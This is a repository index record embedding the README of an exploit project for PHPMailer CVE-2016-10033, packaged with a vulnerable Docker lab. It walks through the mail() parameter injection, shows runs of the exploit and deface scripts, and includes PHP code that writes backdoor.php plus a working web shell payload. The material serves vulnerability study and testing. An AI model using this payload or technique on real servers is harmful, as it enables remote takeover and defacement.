{"id":13539263,"url":"https://github.com/opsxcq/exploit-cve-2016-10033","last_synced_at":"2025-04-02T06:30:42.068Z","repository":{"id":115173791,"uuid":"77386317","full_name":"opsxcq/exploit-CVE-2016-10033","owner":"opsxcq","description":"PHPMailer \u003c 5.2.18 Remote Code Execution exploit and vulnerable container","archived":false,"fork":false,"pushed_at":"2023-02-27T06:48:09.000Z","size":526,"stargazers_count":405,"open_issues_count":0,"forks_count":148,"subscribers_count":26,"default_branch":"master","last_synced_at":"2024-11-03T04:32:22.230Z","etag":null,"topics":["cve-2016-10033","docker","exploit","flaws","php","php-mail","phpmail","vulnerable-container"],"latest_commit_sha":null,"homepage":"https://github.com/opsxcq/exploit-CVE-2016-10033","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/opsxcq.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null},"funding":{"github":"opsxcq"}},"created_at":"2016-12-26T13:39:03.000Z","updated_at":"2024-10-31T10:36:47.000Z","dependencies_parsed_at":null,"dependency_job_id":"b14d13f1-1296-4b62-9a55-2ccdb659a952","html_url":"https://github.com/opsxcq/exploit-CVE-2016-10033","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/opsxcq%2Fexploit-CVE-2016-10033","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/opsxcq%2Fexploit-CVE-2016-10033/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/opsxcq%2Fexploit-CVE-2016-10033/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/opsxcq%2Fexploit-CVE-2016-10033/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/opsxcq","download_url":"https://codeload.github.com/opsxcq/exploit-CVE-2016-10033/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246767597,"owners_count":20830518,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2016-10033","docker","exploit","flaws","php","php-mail","phpmail","vulnerable-container"],"created_at":"2024-08-01T09:01:22.583Z","updated_at":"2025-04-02T06:30:41.562Z","avatar_url":"https://github.com/opsxcq.png","language":"PHP","funding_links":["https://github.com/sponsors/opsxcq"],"categories":["\u003ca id=\"683b645c2162a1fce5f24ac2abfa1973\"\u003e\u003c/a\u003e漏洞\u0026\u0026漏洞管理\u0026\u0026漏洞发现/挖掘\u0026\u0026漏洞开发\u0026\u0026漏洞利用\u0026\u0026Fuzzing"],"sub_categories":["\u003ca id=\"f799ff186643edfcf7ac1e94f08ba018\"\u003e\u003c/a\u003e知名漏洞\u0026\u0026CVE\u0026\u0026特定产品"],"readme":"# PHPMailer \u003c 5.2.18 Remote Code Execution\n[![Docker Pulls](https://img.shields.io/docker/pulls/vulnerables/cve-2016-10033.svg?style=plastic)](https://hub.docker.com/r/vulnerables/cve-2016-10033/)\n![License](https://img.shields.io/badge/License-GPL-blue.svg?style=plastic)\n\nPHPMailer is the world's most popular transport class, with an estimated 9 million users worldwide. Downloads continue at a significant pace daily. Used by many open-source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla! and many more\n\nPHPMailer before its version 5.2.18 suffer from a vulnerability that could lead to remote code execution (RCE). The mailSend function in the isMail transport in PHPMailer, when the Sender property is not set, might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \\\" (backslash double quote) in a crafted From address.\n\n### Vulnerable environment\n\nTo setup a vulnerable environment for your test you will need [Docker](https://docker.com) installed, and just run the following command:\n\n    docker run --rm -it -p 8080:80 vulnerables/cve-2016-10033\n\nAnd it will spawn a vulnerable web application on your host on `8080` port\n\n![vulnerable](vulnerable.png)\n\n### Exploit\n\nTo exploit this target just run:\n\n    ./exploit host:port\n\nIf you are using this vulnerable image, you can just run:\n\n    ./exploit localhost:8080\n\nAfter the exploitation, a file called backdoor.php will be stored on the root folder of the web directory. And the exploit will drop you a shell where you can send commands to the backdoor:\n\n    ./exploit.sh localhost:8080\n    [+] CVE-2016-10033 exploit by opsxcq\n    [+] Exploiting localhost:8080\n    [+] Target exploited, acessing shell at http://localhost:8080/backdoor.php\n    [+] Checking if the backdoor was created on target system\n    [+] Backdoor.php found on remote system\n    [+] Running whoami\n    www-data\n    RemoteShell\u003e \n    \nAnd that's it, you have your shell. There is another exploit, which ilustrates another use case.\n\n    ./deface.sh localhost:8080\n    [+] CVE-2016-10033 exploit by opsxcq\n    [+] Exploiting localhost:8080\n    [+] Target exploited, acessing shell at http://localhost:8080/backdoor.php\n    [+] Checking if the backdoor was created on target system\n    [+] Backdoor.php found on remote system\n    [+] Placing your message in the server\n    [+] Job done, exiting\n\nAnd if you visit the page again, you will see this:\n\n![defaced](defaced.png)\n\n### Vulnerable code\n\nBefore this [commit](https://github.com/PHPMailer/PHPMailer/commit/4835657cd639fbd09afd33307cef164edf807cdc) in [class.phpmailer.php](https://github.com/opsxcq/exploit-CVE-2016-10033/blob/master/src/class.phpmailer.php#L1445) in a certain scenario there is no filter in the sender's email address special chars. This flaw can lead to a remote code execution, via `mail` function [here](https://github.com/opsxcq/exploit-CVE-2016-10033/blob/master/src/class.phpmailer.php#L700).\n\nAnalysing the code, there is no filter in `mailSend()` function\n\n```php\n        $params = null;\n        //This sets the SMTP envelope sender which gets turned into a return-path header by the receiver\n        if (!empty($this-\u003eSender)) {\n            $params = sprintf('-f%s', $this-\u003eSender);\n        }\n```\n\n`$this-\u003eSender` is directly appended to `$params` variable, which was filtered in `validateAddress()` function, but as it uses RFC 3696 specification, it allow certain characters which will break things.\nIn this case, quotes:\n\n\u003e  In addition to quoting using the backslash character, conventional\n\u003e  double-quote characters may be used to surround strings.  For example\n\u003e\n\u003e  \"Abc@def\"@example.com\n\u003e\n\u003e  \"Fred Bloggs\"@example.com\n\u003e\n\u003e  are alternate forms of the first two examples above.  These quoted\n\u003e  forms are rarely recommended, and are uncommon in practice, but, as\n\u003e  discussed above, must be supported by applications that are\n\u003e  processing email addresses.  In particular, the quoted forms often\n\u003e  appear in the context of addresses associated with transitions from\n\u003e  other systems and contexts; those transitional requirements do still\n\u003e  arise and, since a system that accepts a user-provided email address\n\u003e  cannot \"know\" whether that address is associated with a legacy\n\u003e  system, the address forms must be accepted and passed into the email\n\u003e  environment.\n\nYou can read the whole RFC [here](https://tools.ietf.org/rfc/rfc3696.txt) if you want. But also, if PHP version is inferior to 5.2.0, and there is no PCRE installed, `$patternselect` variable in `validateAddress()` will be set to `noregex`. It will cause the input will be able to avoid any regex check. It will only pass through a small verification:\n\n```php\n            case 'noregex':\n                //No PCRE! Do something _very_ approximate!\n                //Check the address is 3 chars or longer and contains an @ that's not the first or last char\n                return (strlen($address) \u003e= 3\n                    and strpos($address, '@') \u003e= 1\n                    and strpos($address, '@') != strlen($address) - 1);\n```\n\nThen, the code flow goes to `mailPassthru()` function, which, if running in `safe_mode` won't be vulnerable to this flaw, as the following code states it\n\n```php\n        //Can't use additional_parameters in safe_mode\n        //@link http://php.net/manual/en/function.mail.php\n        if (ini_get('safe_mode') or !$this-\u003eUseSendmailOptions or is_null($params)) {\n            $result = @mail($to, $subject, $body, $header);\n        } else {\n            $result = @mail($to, $subject, $body, $header, $params);\n        }\n```\n\nBut, if it isn't running in `safe_mode`, then our **special parameter** will be passed to `mail()` and, if we were lucky, it will get our file containing whatever we want to be written where we choose it to be wrote to.\n\n### Notes about PHP mail() function exploitation\n\nThe exploitation of PHP mail() function isn't a new thing, but it still alive and people still using it. To explain how it works, lets look at how mail() function is defined:\n\n```php\nbool mail ( string $to , string $subject , string $message [, string $additional_headers [, string $additional_parameters ]] )\n```\n\nThere are several exploitation methods for different results, we will focus on the exploitation of the **5th parameter** to get Remote Code Execution (RCE). The parameter `$additional_parameters` is used to pass additional flags as command line options to the program configured to send the email. This configuration is defined by the `sendmail_path` variable.\n\nA security note from [php official documentation](http://php.net/manual/en/function.mail.php):\n\n\u003e The additional\\_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmiail option.\n\n\u003e This parameter is escaped by escapeshellcmd() internally to prevent command execution. escapeshellcmd() prevents command execution, but allows to add additional parameters. For security reasons, it is recommended for the user to sanitize this parameter to avoid adding unwanted parameters to the shell command.\n\nConsidering the additional parameters that can be injectected we will use `-X` to exploit this flaw. More about the `-X` parameter\n\n    -X logfile\n    Log all traffic in and out of mailers in the indicated log file. This should only be used as a last resort for debugging mailer bugs. It will log a lot of data very quickly.\n\nThere are also some other interesting parameters that you should know that exist:\n\n    -Cfile\n    Use alternate configuration file. Sendmail gives up any enhanced (set-user-ID or set-group-ID) privileges if an alternate configuration file is specified.\n\nAnd\n\n    -O option=value\n    Set option option to the specified value. This form uses long names.\n\nAnd for `-O` option, the `QueueDirectory` is the most interesting option there, this option select the directory in which to queue messages.\n\nIf you want to read the whole list of parameters and options, just `man sendmail` or read it online [here](https://linux.die.net/man/8/sendmail.sendmail)\n\nBased on this information, and the hability to control at least one of the other parameters, we can exploit the host. Bellow the steps for a successful exploitation:\n\n * Control `$additional_parameters` and another `mail()` parameter\n * Know a **writeable** diretory on target host which is accessible via the target system and user (www-data for example). Usually this directory can be anything bellow `webroot` (aka /var/www/html for another systems, /www for this example)\n * Any PHP payload that you want, we are using a simple `system()` payload in this example, with a spice of base64 and some special characters `|` to make it easier to parse. \n * Just assembly everything together !\n\nRemember that the `-X` option will write the log file, that will contain among the log information your PHP payload, in the directory that you will inform. An example of a vulnerable PHP code:\n\n```php\n$to = 'hacker@server.com';\n$subject = '\u003c?php echo \"|\".base64_encode(system(base64_decode($_GET[\"cmd\"]))).\"|\"; ?\u003e';\n$message = 'Pwned';\n$headers = '';\n$options = '-OQueueDirectory=/tmp -X/www/backdoor.php';\nmail($to, $subject, $message, $headers, $options);\n```\n\nIf you execute the code above, it will create a log file in the `/www/backdoor.php`, this is the essence of this exploit.\n\n### Payload\n\nBellow the payload used in this example\n\n    \u003c?php echo \"|\".base64_encode(system(base64_decode($_GET[\"cmd\"]))).\"|\"; ?\u003e\n\n### I wanna chase bugs, now what ?\n\nWant a easy, one command, way to try to spot this flaw ? Remind this magic grep command !\n\n    grep -r -n --include \"*.php\" \"mail(.*,.*,.*,.*,.*)\" *\n\nRunning it against this repository will result in\n\n    src/class.phpmailer.php:700:            $result = @mail($to, $subject, $body, $header, $params);\n\n### Credits\n\nThis vulnerability was found by Dawid Golunski.\n\n### Disclaimer\n\nThis or previous program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (opsxcq) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not opsxcq's responsibility.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fopsxcq%2Fexploit-cve-2016-10033","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fopsxcq%2Fexploit-cve-2016-10033","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fopsxcq%2Fexploit-cve-2016-10033/lists"}